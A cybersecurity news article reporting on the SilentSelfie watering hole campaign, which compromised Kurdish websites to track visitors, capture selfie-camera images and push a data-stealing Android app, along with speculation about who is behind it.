HQ/EMEAFind out how we can help your business
A watering hole attack targeting Kurdish websites has recently emerged, revealing a significant cybersecurity threat that has persisted for over a year and a half. This campaign, named SilentSelfie, has compromised around 25 websites associated with the Kurdish minority. The first indications of these attacks were detected as early as December 2022.
The websites affected in this campaign include those related to the Kurdish press and media, the Rojava administration, and various revolutionary far-left political organisations in Türkiye and Kurdish regions. Researchers noted that the precise methods employed to breach these sites remain unclear, indicating a potential gap in current threat assessments.
The SilentSelfie campaign has deployed four different variants of information-stealing frameworks.
The simplest variant captures users’ locations, while more sophisticated versions are capable of recording images from users’ selfie cameras and leading specific individuals to install malicious Android applications (APKs). This tactic demonstrates a targeted approach aimed at harvesting sensitive information from individuals engaged with Kurdish-related content.
Malicious JavaScript is the main component of the watering hole attack tactic, which collects a variety of data from site visitors. Locations of users, device information (such as CPU and battery levels), browser type, and public IP addresses are all included in this. Interestingly, three distinct websites have been found to host one variant of this script: targetplatform.net, hawarnews.com, and rojnews[.]news. This version sends users to malicious Android APK downloads in addition to tracking them.
According to analysis, the malicious Android application employs a WebView to present the website while secretly collecting system information, contacts, location, and files from external storage, depending on the permissions granted by users. Importantly, the malicious code does not maintain a presence on the device; it only executes when the user launches the RojNews application. After a delay of ten seconds, the app begins sending the user’s location to a specified URL through HTTP POST requests, signalling a further breach of privacy.
While little is known about the individuals or groups behind the SilentSelfie campaign, it is speculated that the Kurdistan Regional Government of Iraq might be involved, especially in light of the arrest of RojNews journalist Silêman Ehmed in October 2023. His sentencing to three years in prison in July 2024 has raised suspicions regarding the potential motivations behind these attacks.
The sharp volume of Kurdish websites impacted and the campaign’s duration make this watering hole effort noteworthy despite its relatively modest degree of sophistication. The rise of a new threat against the Kurdish minority is shown by this, evoking previous warnings from organisations such as StrongPity and BladeHawk. Given how quickly things are developing, cybersecurity experts need to be on the lookout for new risks in the digital sphere and take extra precautions to be safe.
